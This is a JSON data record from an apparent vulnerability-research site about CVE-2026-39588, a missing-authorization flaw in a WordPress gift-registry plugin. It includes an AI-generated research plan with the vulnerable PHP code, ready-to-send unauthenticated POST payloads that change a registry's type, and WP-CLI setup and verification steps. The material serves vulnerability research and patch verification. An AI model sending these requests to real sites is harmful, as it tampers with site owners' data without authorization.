[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fKWpBQ-rEBE6MCF1rJEpVHXPEIrg-qMaxqDQkIAdN6zc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2026-39588","nm-gift-registry-and-wishlist-lite-missing-authorization","NM Gift Registry and Wishlist Lite \u003C= 5.13 - Missing Authorization","The NM Gift Registry and Wishlist Lite plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 5.13. This makes it possible for unauthenticated attackers to perform an unauthorized action.","nm-gift-registry-and-wishlist-lite",null,"\u003C=5.13","5.14","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-02-18 00:00:00","2026-04-15 21:15:55",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F873d82ef-cc73-4294-a972-9cd5392d3b54?source=api-prod",57,[22,23,24,25,26,27,28,29],"includes\u002FFields\u002FItemsTotalsFields.php","includes\u002FLib\u002FAdminPost.php","includes\u002FLib\u002FOrder.php","includes\u002FLib\u002FSingle.php","includes\u002FLib\u002FWishlist.php","includes\u002FLib\u002FWishlistItem.php","includes\u002FTables\u002FItemsTable.php","includes\u002Fnmgr-functions.php","researched",false,3,"This research plan outlines the process for exploiting a Missing Authorization vulnerability in the **NM Gift Registry and Wishlist Lite** plugin.\n\n### 1. Vulnerability Summary\nThe plugin registers a function `save_chosen_wishlist_type` to the `admin_init` hook in `includes\u002FLib\u002FAdminPost.php`. This function is intended to allow users to select the type (e.g., 'wishlist' or 'gift-registry') for a newly created registry. However, the function fails to perform any capability checks (Missing Authorization) or nonce validations (Missing CSRF protection). \n\nBecause `admin_init` is triggered during requests to `wp-admin\u002Fadmin-ajax.php` regardless of whether the user is logged in, an unauthenticated attacker can call this function to modify the taxonomy type of any existing `nm_gift_registry` post.\n\n### 2. Attack Vector Analysis\n*   **Endpoint**: `wp-admin\u002Fadmin-ajax.php` (or `admin-post.php`, though `admin-ajax.php` is preferred for unauthenticated triggers).\n*   **Method**: `POST`\n*   **Action**: Any dummy action (e.g., `action=nopriv_test`) can be used; the goal is simply to hit the `admin_init` hook.\n*   **Vulnerable Parameters**: \n    *   `nmgr_id_choose_wishist_type`: The ID of the target `nm_gift_registry` post.\n    *   `nm_gift_registry_type`: The taxonomy slug to apply (e.g., `wishlist` or `gift-registry`).\n*   **Authentication**: None (PR:N).\n*   **Preconditions**: An existing Gift Registry or Wishlist must exist (post type `nm_gift_registry`).\n\n### 3. Code Flow\n1.  **Request Entry**: The attacker sends a `POST` request to `wp-admin\u002Fadmin-ajax.php`.\n2.  **Hook Trigger**: WordPress initializes and calls `do_action( 'admin_init' )`.\n3.  **Vulnerable Callback**: `NMGR\\Lib\\AdminPost::save_chosen_wishlist_type()` is executed as it was registered in `AdminPost::run()`:\n    ```php\n    add_action( 'admin_init', array( __CLASS__, 'save_chosen_wishlist_type' ) );\n    ```\n4.  **Parameter Extraction**: The function checks if `$_POST['nmgr_id_choose_wishist_type']` is set:\n    ```php\n    public static function save_chosen_wishlist_type() {\n        if ( !empty( $_POST[ 'nmgr_id_choose_wishist_type' ] ) ) {\n            $wishlist = nmgr()->wishlist();\n            $wishlist->set_id( ( int ) $_POST[ 'nmgr_id_choose_wishist_type' ] );\n            $wishlist->set_type( sanitize_text_field( $_POST[ 'nm_gift_registry_type' ] ) );\n            $wishlist->save_type();\n        }\n    }\n    ```\n5.  **Execution**: The `set_type` and `save_type` methods (defined in `NMGR\\Lib\\Wishlist`) are called, which update the `nm_gift_registry_type` taxonomy for the specified post ID without verifying the requester's identity or permissions.\n\n### 4. Nonce Acquisition Strategy\nThis vulnerability does **not** require a nonce. The `save_chosen_wishlist_type` function does not contain any call to `check_admin_referer()`, `check_ajax_referer()`, or `wp_verify_nonce()`. The attack is possible via a direct unauthenticated POST request.\n\n### 5. Exploitation Strategy\nThe goal is to change an existing \"Wishlist\" into a \"Gift Registry\" (or vice-versa) to demonstrate unauthorized modification of plugin data.\n\n1.  **Identify Target**: Locate a Wishlist ID (e.g., ID `123`).\n2.  **Formulate Payload**:\n    *   `nmgr_id_choose_wishist_type=123`\n    *   `nm_gift_registry_type=gift-registry`\n3.  **Execute Request**:\n    ```bash\n    # Payload sent via http_request tool\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=nopriv_exploit&nmgr_id_choose_wishist_type=123&nm_gift_registry_type=gift-registry\n    ```\n\n### 6. Test Data Setup\nBefore exploitation, we must ensure a registry exists to modify:\n1.  **Create Registry**: Use WP-CLI to create a registry and assign it the `wishlist` type.\n    ```bash\n    # Create the post\n    POST_ID=$(wp post create --post_type=nm_gift_registry --post_title=\"Original Wishlist\" --post_status=publish --porcelain)\n    \n    # Ensure the taxonomy exists and assign 'wishlist'\n    wp term create nm_gift_registry_type \"Wishlist\" --slug=wishlist\n    wp term create nm_gift_registry_type \"Gift Registry\" --slug=gift-registry\n    wp post term set $POST_ID nm_gift_registry_type wishlist\n    ```\n\n### 7. Expected Results\n*   The server will return a standard AJAX response (usually `0` since the `nopriv_exploit` action isn't handled, but the `admin_init` hook will have already processed our payload).\n*   The taxonomy for the post will change from `wishlist` to `gift-registry`.\n\n### 8. Verification Steps\nAfter the HTTP request, verify the taxonomy change using WP-CLI:\n```bash\n# Check the current terms for the target post\nwp post term list $POST_ID nm_gift_registry_type --fields=slug\n```\nIf the output is `gift-registry`, the exploit was successful.\n\n### 9. Alternative Approaches\nIf `admin-ajax.php` fails due to environment-specific hardening, the same payload can be sent to `wp-admin\u002Fadmin-post.php`. \n\n```bash\nPOST \u002Fwp-admin\u002Fadmin-post.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\n\nnmgr_id_choose_wishist_type=123&nm_gift_registry_type=gift-registry\n```\nNote: In `admin-post.php`, WordPress might attempt to redirect unauthenticated users to the login page via `auth_redirect()`, but `admin_init` fires **before** most of those checks, potentially allowing the payload to execute before the redirect occurs.","gemini-3-flash-preview","2026-04-19 05:12:07","2026-04-19 05:12:35",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","5.13","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnm-gift-registry-and-wishlist-lite\u002Ftags\u002F5.13","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnm-gift-registry-and-wishlist-lite.5.13.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnm-gift-registry-and-wishlist-lite\u002Ftags\u002F5.14","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fnm-gift-registry-and-wishlist-lite.5.14.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fnm-gift-registry-and-wishlist-lite\u002Ftags"]